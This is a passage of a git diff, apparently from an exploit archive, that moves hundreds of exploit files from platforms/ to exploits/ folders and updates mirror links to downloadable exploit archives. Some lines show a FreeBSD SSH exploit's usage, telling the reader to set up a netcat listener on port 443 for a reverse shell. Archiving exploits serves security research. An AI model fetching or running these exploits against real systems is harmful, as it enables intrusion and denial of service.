a/platforms/freebsd/local/22574.pl b/exploits/freebsd/local/22574.pl similarity index 100% rename from platforms/freebsd/local/22574.pl rename to exploits/freebsd/local/22574.pl diff --git a/platforms/freebsd/local/22580.c b/exploits/freebsd/local/22580.c similarity index 100% rename from platforms/freebsd/local/22580.c rename to exploits/freebsd/local/22580.c diff --git a/platforms/freebsd/local/22613.pl b/exploits/freebsd/local/22613.pl similarity index 100% rename from platforms/freebsd/local/22613.pl rename to exploits/freebsd/local/22613.pl diff --git a/platforms/freebsd/local/22614.c b/exploits/freebsd/local/22614.c similarity index 100% rename from platforms/freebsd/local/22614.c rename to exploits/freebsd/local/22614.c diff --git a/platforms/freebsd/local/22615.c b/exploits/freebsd/local/22615.c similarity index 100% rename from platforms/freebsd/local/22615.c rename to exploits/freebsd/local/22615.c diff --git a/platforms/freebsd/local/22661.c b/exploits/freebsd/local/22661.c similarity index 100% rename from platforms/freebsd/local/22661.c rename to exploits/freebsd/local/22661.c diff --git a/platforms/freebsd/local/26368.c b/exploits/freebsd/local/26368.c similarity index 100% rename from platforms/freebsd/local/26368.c rename to exploits/freebsd/local/26368.c diff --git a/platforms/freebsd/local/26454.rb b/exploits/freebsd/local/26454.rb similarity index 100% rename from platforms/freebsd/local/26454.rb rename to exploits/freebsd/local/26454.rb diff --git a/platforms/freebsd/local/28718.c b/exploits/freebsd/local/28718.c similarity index 100% rename from platforms/freebsd/local/28718.c rename to exploits/freebsd/local/28718.c diff --git a/platforms/freebsd/local/32946.c b/exploits/freebsd/local/32946.c similarity index 100% rename from platforms/freebsd/local/32946.c rename to exploits/freebsd/local/32946.c diff --git a/platforms/freebsd/local/7581.c b/exploits/freebsd/local/7581.c similarity index 100% rename from platforms/freebsd/local/7581.c rename to exploits/freebsd/local/7581.c diff --git a/platforms/freebsd/local/8055.txt b/exploits/freebsd/local/8055.txt similarity index 100% rename from platforms/freebsd/local/8055.txt rename to exploits/freebsd/local/8055.txt diff --git a/platforms/freebsd/local/8261.c b/exploits/freebsd/local/8261.c similarity index 100% rename from platforms/freebsd/local/8261.c rename to exploits/freebsd/local/8261.c diff --git a/platforms/freebsd/local/9082.c b/exploits/freebsd/local/9082.c similarity index 100% rename from platforms/freebsd/local/9082.c rename to exploits/freebsd/local/9082.c diff --git a/platforms/freebsd/local/9488.c b/exploits/freebsd/local/9488.c similarity index 100% rename from platforms/freebsd/local/9488.c rename to exploits/freebsd/local/9488.c diff --git a/platforms/freebsd/local/9859.c b/exploits/freebsd/local/9859.c similarity index 100% rename from platforms/freebsd/local/9859.c rename to exploits/freebsd/local/9859.c diff --git a/platforms/freebsd/local/9860.c b/exploits/freebsd/local/9860.c similarity index 100% rename from platforms/freebsd/local/9860.c rename to exploits/freebsd/local/9860.c diff --git a/platforms/freebsd/remote/15723.c b/exploits/freebsd/remote/15723.c similarity index 100% rename from platforms/freebsd/remote/15723.c rename to exploits/freebsd/remote/15723.c diff --git a/platforms/freebsd/remote/16918.rb b/exploits/freebsd/remote/16918.rb similarity index 100% rename from platforms/freebsd/remote/16918.rb rename to exploits/freebsd/remote/16918.rb diff --git a/platforms/freebsd/remote/17462.txt b/exploits/freebsd/remote/17462.txt similarity index 96% rename from platforms/freebsd/remote/17462.txt rename to exploits/freebsd/remote/17462.txt index 7b96b3d69..64ff28c40 100644 --- a/platforms/freebsd/remote/17462.txt +++ b/exploits/freebsd/remote/17462.txt @@ -196,7 +196,7 @@ Kingcope A statically linked linux binary of the exploit can be found below attached is a diff to openssh-5.8p2. the statically linked binary can be downloaded from http://isowarez.de/ssh_0day -Mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/17462.tar.gz (ssh_0day.tar.gz) +Mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/17462.tar.gz (ssh_0day.tar.gz) run like ./ssh -1 -z setup a netcat, port 443 on yourip first \ No newline at end of file diff --git a/platforms/freebsd/remote/18181.txt b/exploits/freebsd/remote/18181.txt similarity index 91% rename from platforms/freebsd/remote/18181.txt rename to exploits/freebsd/remote/18181.txt index f145d7516..d9521a2fd 100644 --- a/platforms/freebsd/remote/18181.txt +++ b/exploits/freebsd/remote/18181.txt @@ -33,4 +33,4 @@ BTW my box (isowarez.de) got hacked so expect me in a zine :> /Signed "the awesome" Kingcope Code: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/18181.tar (7350roaringbeastv3.tar) \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/18181.tar (7350roaringbeastv3.tar) \ No newline at end of file diff --git a/platforms/freebsd/remote/20292.pl b/exploits/freebsd/remote/20292.pl similarity index 100% rename from platforms/freebsd/remote/20292.pl rename to exploits/freebsd/remote/20292.pl diff --git a/platforms/freebsd/remote/20593.txt b/exploits/freebsd/remote/20593.txt similarity index 93% rename from platforms/freebsd/remote/20593.txt rename to exploits/freebsd/remote/20593.txt index 663308d55..b081f4245 100644 --- a/platforms/freebsd/remote/20593.txt +++ b/exploits/freebsd/remote/20593.txt @@ -8,4 +8,4 @@ It is possible for packets that are not part of an established connection to be Exploitation of this vulnerability may allow for unauthorized remote access to otherwise protected services. -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/20593.tgz \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/20593.tgz \ No newline at end of file diff --git a/platforms/freebsd/remote/20732.pl b/exploits/freebsd/remote/20732.pl similarity index 100% rename from platforms/freebsd/remote/20732.pl rename to exploits/freebsd/remote/20732.pl diff --git a/platforms/freebsd/remote/20941.pl b/exploits/freebsd/remote/20941.pl similarity index 100% rename from platforms/freebsd/remote/20941.pl rename to exploits/freebsd/remote/20941.pl diff --git a/platforms/freebsd/remote/21614.c b/exploits/freebsd/remote/21614.c similarity index 100% rename from platforms/freebsd/remote/21614.c rename to exploits/freebsd/remote/21614.c diff --git a/platforms/freebsd/remote/22832.pl b/exploits/freebsd/remote/22832.pl similarity index 100% rename from platforms/freebsd/remote/22832.pl rename to exploits/freebsd/remote/22832.pl diff --git a/platforms/freebsd/remote/22890.pl b/exploits/freebsd/remote/22890.pl similarity index 100% rename from platforms/freebsd/remote/22890.pl rename to exploits/freebsd/remote/22890.pl diff --git a/platforms/freebsd/remote/22891.pl b/exploits/freebsd/remote/22891.pl similarity index 100% rename from platforms/freebsd/remote/22891.pl rename to exploits/freebsd/remote/22891.pl diff --git a/platforms/freebsd/remote/22976.pl b/exploits/freebsd/remote/22976.pl similarity index 100% rename from platforms/freebsd/remote/22976.pl rename to exploits/freebsd/remote/22976.pl diff --git a/platforms/freebsd/remote/25687.c b/exploits/freebsd/remote/25687.c similarity index 100% rename from platforms/freebsd/remote/25687.c rename to exploits/freebsd/remote/25687.c diff --git a/platforms/freebsd/remote/9278.txt b/exploits/freebsd/remote/9278.txt similarity index 100% rename from platforms/freebsd/remote/9278.txt rename to exploits/freebsd/remote/9278.txt diff --git a/platforms/freebsd/webapps/12658.txt b/exploits/freebsd/webapps/12658.txt similarity index 86% rename from platforms/freebsd/webapps/12658.txt rename to exploits/freebsd/webapps/12658.txt index fcff4e686..661051eaf 100644 --- a/platforms/freebsd/webapps/12658.txt +++ b/exploits/freebsd/webapps/12658.txt @@ -15,4 +15,4 @@ improper profile check. =========== Download: =========== -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/12658.pdf (cybsec_advisory_2010_0501_Ironmail_Advisory_Web_Access_Broken_Access.pdf) \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/12658.pdf (cybsec_advisory_2010_0501_Ironmail_Advisory_Web_Access_Broken_Access.pdf) \ No newline at end of file diff --git a/platforms/freebsd/webapps/23202.txt b/exploits/freebsd/webapps/23202.txt similarity index 100% rename from platforms/freebsd/webapps/23202.txt rename to exploits/freebsd/webapps/23202.txt diff --git a/platforms/freebsd/webapps/24439.txt b/exploits/freebsd/webapps/24439.txt similarity index 100% rename from platforms/freebsd/webapps/24439.txt rename to exploits/freebsd/webapps/24439.txt diff --git a/platforms/freebsd_x86-64/dos/39570.c b/exploits/freebsd_x86-64/dos/39570.c similarity index 100% rename from platforms/freebsd_x86-64/dos/39570.c rename to exploits/freebsd_x86-64/dos/39570.c diff --git a/platforms/freebsd_x86/dos/42277.c b/exploits/freebsd_x86/dos/42277.c similarity index 100% rename from platforms/freebsd_x86/dos/42277.c rename to exploits/freebsd_x86/dos/42277.c diff --git a/platforms/freebsd_x86/dos/42278.c b/exploits/freebsd_x86/dos/42278.c similarity index 100% rename from platforms/freebsd_x86/dos/42278.c rename to exploits/freebsd_x86/dos/42278.c diff --git a/platforms/freebsd_x86/dos/42279.c b/exploits/freebsd_x86/dos/42279.c similarity index 100% rename from platforms/freebsd_x86/dos/42279.c rename to exploits/freebsd_x86/dos/42279.c diff --git a/platforms/hardware/dos/10182.py b/exploits/hardware/dos/10182.py similarity index 100% rename from platforms/hardware/dos/10182.py rename to exploits/hardware/dos/10182.py diff --git a/platforms/hardware/dos/10237.txt b/exploits/hardware/dos/10237.txt similarity index 100% rename from platforms/hardware/dos/10237.txt rename to exploits/hardware/dos/10237.txt diff --git a/platforms/hardware/dos/10352.txt b/exploits/hardware/dos/10352.txt similarity index 100% rename from platforms/hardware/dos/10352.txt rename to exploits/hardware/dos/10352.txt diff --git a/platforms/hardware/dos/10553.rb b/exploits/hardware/dos/10553.rb similarity index 100% rename from platforms/hardware/dos/10553.rb rename to exploits/hardware/dos/10553.rb diff --git a/platforms/hardware/dos/10580.rb b/exploits/hardware/dos/10580.rb similarity index 100% rename from platforms/hardware/dos/10580.rb rename to exploits/hardware/dos/10580.rb diff --git a/platforms/hardware/dos/10947.txt b/exploits/hardware/dos/10947.txt similarity index 100% rename from platforms/hardware/dos/10947.txt rename to exploits/hardware/dos/10947.txt diff --git a/platforms/hardware/dos/11043.txt b/exploits/hardware/dos/11043.txt similarity index 94% rename from platforms/hardware/dos/11043.txt rename to exploits/hardware/dos/11043.txt index aa30834f5..0d1a89634 100644 --- a/platforms/hardware/dos/11043.txt +++ b/exploits/hardware/dos/11043.txt @@ -36,4 +36,4 @@ Email : f3arm3d3ar@gmail.com =============== Download =============== -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/11043.rar (Sony_Ericsson.rar) \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/11043.rar (Sony_Ericsson.rar) \ No newline at end of file diff --git a/platforms/hardware/dos/11125.pl b/exploits/hardware/dos/11125.pl similarity index 100% rename from platforms/hardware/dos/11125.pl rename to exploits/hardware/dos/11125.pl diff --git a/platforms/hardware/dos/11291.txt b/exploits/hardware/dos/11291.txt similarity index 100% rename from platforms/hardware/dos/11291.txt rename to exploits/hardware/dos/11291.txt diff --git a/platforms/hardware/dos/11427.txt b/exploits/hardware/dos/11427.txt similarity index 100% rename from platforms/hardware/dos/11427.txt rename to exploits/hardware/dos/11427.txt diff --git a/platforms/hardware/dos/1153.pl b/exploits/hardware/dos/1153.pl similarity index 100% rename from platforms/hardware/dos/1153.pl rename to exploits/hardware/dos/1153.pl diff --git a/platforms/hardware/dos/11546.py b/exploits/hardware/dos/11546.py similarity index 100% rename from platforms/hardware/dos/11546.py rename to exploits/hardware/dos/11546.py diff --git a/platforms/hardware/dos/11552.pl b/exploits/hardware/dos/11552.pl similarity index 100% rename from platforms/hardware/dos/11552.pl rename to exploits/hardware/dos/11552.pl diff --git a/platforms/hardware/dos/11556.pl b/exploits/hardware/dos/11556.pl similarity index 100% rename from platforms/hardware/dos/11556.pl rename to exploits/hardware/dos/11556.pl diff --git a/platforms/hardware/dos/11574.py b/exploits/hardware/dos/11574.py similarity index 100% rename from platforms/hardware/dos/11574.py rename to exploits/hardware/dos/11574.py diff --git a/platforms/hardware/dos/11597.py b/exploits/hardware/dos/11597.py similarity index 100% rename from platforms/hardware/dos/11597.py rename to exploits/hardware/dos/11597.py diff --git a/platforms/hardware/dos/11608.rb b/exploits/hardware/dos/11608.rb similarity index 100% rename from platforms/hardware/dos/11608.rb rename to exploits/hardware/dos/11608.rb diff --git a/platforms/hardware/dos/11633.pl b/exploits/hardware/dos/11633.pl similarity index 100% rename from platforms/hardware/dos/11633.pl rename to exploits/hardware/dos/11633.pl diff --git a/platforms/hardware/dos/11769.py b/exploits/hardware/dos/11769.py similarity index 100% rename from platforms/hardware/dos/11769.py rename to exploits/hardware/dos/11769.py diff --git a/platforms/hardware/dos/11880.txt b/exploits/hardware/dos/11880.txt similarity index 100% rename from platforms/hardware/dos/11880.txt rename to exploits/hardware/dos/11880.txt diff --git a/platforms/hardware/dos/12093.txt b/exploits/hardware/dos/12093.txt similarity index 90% rename from platforms/hardware/dos/12093.txt rename to exploits/hardware/dos/12093.txt index a77d569ed..554d125f8 100644 --- a/platforms/hardware/dos/12093.txt +++ b/exploits/hardware/dos/12093.txt @@ -15,4 +15,4 @@ Users inside the CLI can run some kind of “Fork Bomb” in order to saturate s of an insecure ulimit value. Download: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/12093.pdf (cybsec_advisory_2010_0401.pdf) \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/12093.pdf (cybsec_advisory_2010_0401.pdf) \ No newline at end of file diff --git a/platforms/hardware/dos/12252.txt b/exploits/hardware/dos/12252.txt similarity index 100% rename from platforms/hardware/dos/12252.txt rename to exploits/hardware/dos/12252.txt diff --git a/platforms/hardware/dos/12297.txt b/exploits/hardware/dos/12297.txt similarity index 100% rename from platforms/hardware/dos/12297.txt rename to exploits/hardware/dos/12297.txt diff --git a/platforms/hardware/dos/12344.txt b/exploits/hardware/dos/12344.txt similarity index 100% rename from platforms/hardware/dos/12344.txt rename to exploits/hardware/dos/12344.txt diff --git a/platforms/hardware/dos/1274.c b/exploits/hardware/dos/1274.c similarity index 100% rename from platforms/hardware/dos/1274.c rename to exploits/hardware/dos/1274.c diff --git a/platforms/hardware/dos/1338.pl b/exploits/hardware/dos/1338.pl similarity index 100% rename from platforms/hardware/dos/1338.pl rename to exploits/hardware/dos/1338.pl diff --git a/platforms/hardware/dos/13774.pl b/exploits/hardware/dos/13774.pl similarity index 100% rename from platforms/hardware/dos/13774.pl rename to exploits/hardware/dos/13774.pl diff --git a/platforms/hardware/dos/13775.pl b/exploits/hardware/dos/13775.pl similarity index 100% rename from platforms/hardware/dos/13775.pl rename to exploits/hardware/dos/13775.pl diff --git a/platforms/hardware/dos/13823.txt b/exploits/hardware/dos/13823.txt similarity index 85% rename from platforms/hardware/dos/13823.txt rename to exploits/hardware/dos/13823.txt index bc21da893..38093a303 100644 --- a/platforms/hardware/dos/13823.txt +++ b/exploits/hardware/dos/13823.txt @@ -1,3 +1,3 @@ I wrote a fuzzer "dumb fuzzer" and used a sample from http://www.ccp14.ac.uk/ccp/web-mirrors/bca-spreadsheets/scanplot101.xls which I randomly found on the internet. I mutated the data and tested roughly 1000 cases on several Document Reader Applications for iPhone. -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/13823.xls (savysoda_poc.xls) \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/13823.xls (savysoda_poc.xls) \ No newline at end of file diff --git a/platforms/hardware/dos/13824.txt b/exploits/hardware/dos/13824.txt similarity index 85% rename from platforms/hardware/dos/13824.txt rename to exploits/hardware/dos/13824.txt index 137f83661..65647a151 100644 --- a/platforms/hardware/dos/13824.txt +++ b/exploits/hardware/dos/13824.txt @@ -1,3 +1,3 @@ I wrote a fuzzer "dumb fuzzer" and used a sample from http://www.ccp14.ac.uk/ccp/web-mirrors/bca-spreadsheets/scanplot101.xls which I randomly found on the internet. I mutated the data and tested roughly 1000 cases on several Document Reader Applications for iPhone. -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/13824.xls (office2_poc.xls) \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/13824.xls (office2_poc.xls) \ No newline at end of file diff --git a/platforms/hardware/dos/13825.txt b/exploits/hardware/dos/13825.txt similarity index 85% rename from platforms/hardware/dos/13825.txt rename to exploits/hardware/dos/13825.txt index ead2087cb..f513e1237 100644 --- a/platforms/hardware/dos/13825.txt +++ b/exploits/hardware/dos/13825.txt @@ -1,3 +1,3 @@ I wrote a fuzzer "dumb fuzzer" and used a sample from http://www.ccp14.ac.uk/ccp/web-mirrors/bca-spreadsheets/scanplot101.xls which I randomly found on the internet. I mutated the data and tested roughly 1000 cases on several Document Reader Applications for iPhone. -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/13825.xls (goodreader_poc.xls) \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/13825.xls (goodreader_poc.xls) \ No newline at end of file diff --git a/platforms/hardware/dos/1411.pl b/exploits/hardware/dos/1411.pl similarity index 100% rename from platforms/hardware/dos/1411.pl rename to exploits/hardware/dos/1411.pl diff --git a/platforms/hardware/dos/1447.c b/exploits/hardware/dos/1447.c similarity index 100% rename from platforms/hardware/dos/1447.c rename to exploits/hardware/dos/1447.c diff --git a/platforms/hardware/dos/1464.c b/exploits/hardware/dos/1464.c similarity index 100% rename from platforms/hardware/dos/1464.c rename to exploits/hardware/dos/1464.c diff --git a/platforms/hardware/dos/1473.c b/exploits/hardware/dos/1473.c similarity index 100% rename from platforms/hardware/dos/1473.c rename to exploits/hardware/dos/1473.c diff --git a/platforms/hardware/dos/1496.c b/exploits/hardware/dos/1496.c similarity index 100% rename from platforms/hardware/dos/1496.c rename to exploits/hardware/dos/1496.c diff --git a/platforms/hardware/dos/15380.txt b/exploits/hardware/dos/15380.txt similarity index 100% rename from platforms/hardware/dos/15380.txt rename to exploits/hardware/dos/15380.txt diff --git a/platforms/hardware/dos/15504.txt b/exploits/hardware/dos/15504.txt similarity index 100% rename from platforms/hardware/dos/15504.txt rename to exploits/hardware/dos/15504.txt diff --git a/platforms/hardware/dos/15508.txt b/exploits/hardware/dos/15508.txt similarity index 100% rename from platforms/hardware/dos/15508.txt rename to exploits/hardware/dos/15508.txt diff --git a/platforms/hardware/dos/1551.txt b/exploits/hardware/dos/1551.txt similarity index 100% rename from platforms/hardware/dos/1551.txt rename to exploits/hardware/dos/1551.txt diff --git a/platforms/hardware/dos/15792.php b/exploits/hardware/dos/15792.php similarity index 100% rename from platforms/hardware/dos/15792.php rename to exploits/hardware/dos/15792.php diff --git a/platforms/hardware/dos/15794.php b/exploits/hardware/dos/15794.php similarity index 100% rename from platforms/hardware/dos/15794.php rename to exploits/hardware/dos/15794.php diff --git a/platforms/hardware/dos/15796.php b/exploits/hardware/dos/15796.php similarity index 100% rename from platforms/hardware/dos/15796.php rename to exploits/hardware/dos/15796.php diff --git a/platforms/hardware/dos/15805.php b/exploits/hardware/dos/15805.php similarity index 100% rename from platforms/hardware/dos/15805.php rename to exploits/hardware/dos/15805.php diff --git a/platforms/hardware/dos/16068.pl b/exploits/hardware/dos/16068.pl similarity index 100% rename from platforms/hardware/dos/16068.pl rename to exploits/hardware/dos/16068.pl diff --git a/platforms/hardware/dos/16945.pl b/exploits/hardware/dos/16945.pl similarity index 100% rename from platforms/hardware/dos/16945.pl rename to exploits/hardware/dos/16945.pl diff --git a/platforms/hardware/dos/1718.pl b/exploits/hardware/dos/1718.pl similarity index 100% rename from platforms/hardware/dos/1718.pl rename to exploits/hardware/dos/1718.pl diff --git a/platforms/hardware/dos/17351.py b/exploits/hardware/dos/17351.py similarity index 100% rename from platforms/hardware/dos/17351.py rename to exploits/hardware/dos/17351.py diff --git a/platforms/hardware/dos/17353.pl b/exploits/hardware/dos/17353.pl similarity index 100% rename from platforms/hardware/dos/17353.pl rename to exploits/hardware/dos/17353.pl diff --git a/platforms/hardware/dos/17501.py b/exploits/hardware/dos/17501.py similarity index 100% rename from platforms/hardware/dos/17501.py rename to exploits/hardware/dos/17501.py diff --git a/platforms/hardware/dos/18199.pl b/exploits/hardware/dos/18199.pl similarity index 100% rename from platforms/hardware/dos/18199.pl rename to exploits/hardware/dos/18199.pl diff --git a/platforms/hardware/dos/18336.pl b/exploits/hardware/dos/18336.pl similarity index 100% rename from platforms/hardware/dos/18336.pl rename to exploits/hardware/dos/18336.pl diff --git a/platforms/hardware/dos/18688.txt b/exploits/hardware/dos/18688.txt similarity index 100% rename from platforms/hardware/dos/18688.txt rename to exploits/hardware/dos/18688.txt diff --git a/platforms/hardware/dos/18705.txt b/exploits/hardware/dos/18705.txt similarity index 100% rename from platforms/hardware/dos/18705.txt rename to exploits/hardware/dos/18705.txt diff --git a/platforms/hardware/dos/18734.txt b/exploits/hardware/dos/18734.txt similarity index 100% rename from platforms/hardware/dos/18734.txt rename to exploits/hardware/dos/18734.txt diff --git a/platforms/hardware/dos/18751.txt b/exploits/hardware/dos/18751.txt similarity index 96% rename from platforms/hardware/dos/18751.txt rename to exploits/hardware/dos/18751.txt index 9385306da..9f6f94dfe 100644 --- a/platforms/hardware/dos/18751.txt +++ b/exploits/hardware/dos/18751.txt @@ -130,7 +130,7 @@ other bugs and understanding them :) http://aluigi.org/poc/samsux_1.zip -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/18751.zip +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/18751.zip ####################################################################### diff --git a/platforms/hardware/dos/18817.py b/exploits/hardware/dos/18817.py similarity index 100% rename from platforms/hardware/dos/18817.py rename to exploits/hardware/dos/18817.py diff --git a/platforms/hardware/dos/19064.txt b/exploits/hardware/dos/19064.txt similarity index 100% rename from platforms/hardware/dos/19064.txt rename to exploits/hardware/dos/19064.txt diff --git a/platforms/hardware/dos/19137.rb b/exploits/hardware/dos/19137.rb similarity index 100% rename from platforms/hardware/dos/19137.rb rename to exploits/hardware/dos/19137.rb diff --git a/platforms/hardware/dos/19436.txt b/exploits/hardware/dos/19436.txt similarity index 100% rename from platforms/hardware/dos/19436.txt rename to exploits/hardware/dos/19436.txt diff --git a/platforms/hardware/dos/19441.c b/exploits/hardware/dos/19441.c similarity index 100% rename from platforms/hardware/dos/19441.c rename to exploits/hardware/dos/19441.c diff --git a/platforms/hardware/dos/19477.txt b/exploits/hardware/dos/19477.txt similarity index 100% rename from platforms/hardware/dos/19477.txt rename to exploits/hardware/dos/19477.txt diff --git a/platforms/hardware/dos/19513.txt b/exploits/hardware/dos/19513.txt similarity index 100% rename from platforms/hardware/dos/19513.txt rename to exploits/hardware/dos/19513.txt diff --git a/platforms/hardware/dos/19531.txt b/exploits/hardware/dos/19531.txt similarity index 100% rename from platforms/hardware/dos/19531.txt rename to exploits/hardware/dos/19531.txt diff --git a/platforms/hardware/dos/19766.txt b/exploits/hardware/dos/19766.txt similarity index 100% rename from platforms/hardware/dos/19766.txt rename to exploits/hardware/dos/19766.txt diff --git a/platforms/hardware/dos/19919.c b/exploits/hardware/dos/19919.c similarity index 100% rename from platforms/hardware/dos/19919.c rename to exploits/hardware/dos/19919.c diff --git a/platforms/hardware/dos/19923.txt b/exploits/hardware/dos/19923.txt similarity index 100% rename from platforms/hardware/dos/19923.txt rename to exploits/hardware/dos/19923.txt diff --git a/platforms/hardware/dos/2000.pl b/exploits/hardware/dos/2000.pl similarity index 100% rename from platforms/hardware/dos/2000.pl rename to exploits/hardware/dos/2000.pl diff --git a/platforms/hardware/dos/20050.c b/exploits/hardware/dos/20050.c similarity index 100% rename from platforms/hardware/dos/20050.c rename to exploits/hardware/dos/20050.c diff --git a/platforms/hardware/dos/20090.txt b/exploits/hardware/dos/20090.txt similarity index 100% rename from platforms/hardware/dos/20090.txt rename to exploits/hardware/dos/20090.txt diff --git a/platforms/hardware/dos/20323.txt b/exploits/hardware/dos/20323.txt similarity index 100% rename from platforms/hardware/dos/20323.txt rename to exploits/hardware/dos/20323.txt diff --git a/platforms/hardware/dos/20328.txt b/exploits/hardware/dos/20328.txt similarity index 100% rename from platforms/hardware/dos/20328.txt rename to exploits/hardware/dos/20328.txt diff --git a/platforms/hardware/dos/20331.c b/exploits/hardware/dos/20331.c similarity index 100% rename from platforms/hardware/dos/20331.c rename to exploits/hardware/dos/20331.c diff --git a/platforms/hardware/dos/20332.pl b/exploits/hardware/dos/20332.pl similarity index 100% rename from platforms/hardware/dos/20332.pl rename to exploits/hardware/dos/20332.pl diff --git a/platforms/hardware/dos/20473.pl b/exploits/hardware/dos/20473.pl similarity index 100% rename from platforms/hardware/dos/20473.pl rename to exploits/hardware/dos/20473.pl diff --git a/platforms/hardware/dos/20487.pl b/exploits/hardware/dos/20487.pl similarity index 100% rename from platforms/hardware/dos/20487.pl rename to exploits/hardware/dos/20487.pl diff --git a/platforms/hardware/dos/20509.pl b/exploits/hardware/dos/20509.pl similarity index 100% rename from platforms/hardware/dos/20509.pl rename to exploits/hardware/dos/20509.pl diff --git a/platforms/hardware/dos/2059.cpp b/exploits/hardware/dos/2059.cpp similarity index 100% rename from platforms/hardware/dos/2059.cpp rename to exploits/hardware/dos/2059.cpp diff --git a/platforms/hardware/dos/20644.c b/exploits/hardware/dos/20644.c similarity index 100% rename from platforms/hardware/dos/20644.c rename to exploits/hardware/dos/20644.c diff --git a/platforms/hardware/dos/20654.pl b/exploits/hardware/dos/20654.pl similarity index 100% rename from platforms/hardware/dos/20654.pl rename to exploits/hardware/dos/20654.pl diff --git a/platforms/hardware/dos/20734.sh b/exploits/hardware/dos/20734.sh similarity index 100% rename from platforms/hardware/dos/20734.sh rename to exploits/hardware/dos/20734.sh diff --git a/platforms/hardware/dos/20821.txt b/exploits/hardware/dos/20821.txt similarity index 95% rename from platforms/hardware/dos/20821.txt rename to exploits/hardware/dos/20821.txt index 4e240c13c..98465237a 100644 --- a/platforms/hardware/dos/20821.txt +++ b/exploits/hardware/dos/20821.txt @@ -6,4 +6,4 @@ A problem in the Cisco Hot Standby Routing Protocol (HSRP) makes it possible to This problem makes it possible for system local to the network to deny service to legitmate users of that network segment. -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/20821.tgz \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/20821.tgz \ No newline at end of file diff --git a/platforms/hardware/dos/20824.txt b/exploits/hardware/dos/20824.txt similarity index 94% rename from platforms/hardware/dos/20824.txt rename to exploits/hardware/dos/20824.txt index c0b85add3..afd186668 100644 --- a/platforms/hardware/dos/20824.txt +++ b/exploits/hardware/dos/20824.txt @@ -6,4 +6,4 @@ A problem with the switch firmware could allow a Denial of Service to legitimate This problem makes it possible for a remote user to deny service to legitimate users of the switch. -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/20824.tgz \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/20824.tgz \ No newline at end of file diff --git a/platforms/hardware/dos/20847.c b/exploits/hardware/dos/20847.c similarity index 100% rename from platforms/hardware/dos/20847.c rename to exploits/hardware/dos/20847.c diff --git a/platforms/hardware/dos/21028.pl b/exploits/hardware/dos/21028.pl similarity index 100% rename from platforms/hardware/dos/21028.pl rename to exploits/hardware/dos/21028.pl diff --git a/platforms/hardware/dos/21092.txt b/exploits/hardware/dos/21092.txt similarity index 93% rename from platforms/hardware/dos/21092.txt rename to exploits/hardware/dos/21092.txt index 7a46e8f00..856b3c9d8 100644 --- a/platforms/hardware/dos/21092.txt +++ b/exploits/hardware/dos/21092.txt @@ -7,4 +7,4 @@ CBOS becomes unstable when it receives multiple TCP connections on one of the tw This problem affects the following Cisco 600 series routers: 627, 633, 673, 675, 675E, 677, 677i and 678. -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/21092.mrc \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/21092.mrc \ No newline at end of file diff --git a/platforms/hardware/dos/21103.c b/exploits/hardware/dos/21103.c similarity index 100% rename from platforms/hardware/dos/21103.c rename to exploits/hardware/dos/21103.c diff --git a/platforms/hardware/dos/21296.c b/exploits/hardware/dos/21296.c similarity index 100% rename from platforms/hardware/dos/21296.c rename to exploits/hardware/dos/21296.c diff --git a/platforms/hardware/dos/21465.txt b/exploits/hardware/dos/21465.txt similarity index 100% rename from platforms/hardware/dos/21465.txt rename to exploits/hardware/dos/21465.txt diff --git a/platforms/hardware/dos/21472.pl b/exploits/hardware/dos/21472.pl similarity index 100% rename from platforms/hardware/dos/21472.pl rename to exploits/hardware/dos/21472.pl diff --git a/platforms/hardware/dos/21523.txt b/exploits/hardware/dos/21523.txt similarity index 100% rename from platforms/hardware/dos/21523.txt rename to exploits/hardware/dos/21523.txt diff --git a/platforms/hardware/dos/2156.c b/exploits/hardware/dos/2156.c similarity index 100% rename from platforms/hardware/dos/2156.c rename to exploits/hardware/dos/2156.c diff --git a/platforms/hardware/dos/21561.txt b/exploits/hardware/dos/21561.txt similarity index 100% rename from platforms/hardware/dos/21561.txt rename to exploits/hardware/dos/21561.txt diff --git a/platforms/hardware/dos/21637.c b/exploits/hardware/dos/21637.c similarity index 100% rename from platforms/hardware/dos/21637.c rename to exploits/hardware/dos/21637.c diff --git a/platforms/hardware/dos/21655.c b/exploits/hardware/dos/21655.c similarity index 100% rename from platforms/hardware/dos/21655.c rename to exploits/hardware/dos/21655.c diff --git a/platforms/hardware/dos/21656.txt b/exploits/hardware/dos/21656.txt similarity index 100% rename from platforms/hardware/dos/21656.txt rename to exploits/hardware/dos/21656.txt diff --git a/platforms/hardware/dos/21657.txt b/exploits/hardware/dos/21657.txt similarity index 100% rename from platforms/hardware/dos/21657.txt rename to exploits/hardware/dos/21657.txt diff --git a/platforms/hardware/dos/21736.txt b/exploits/hardware/dos/21736.txt similarity index 100% rename from 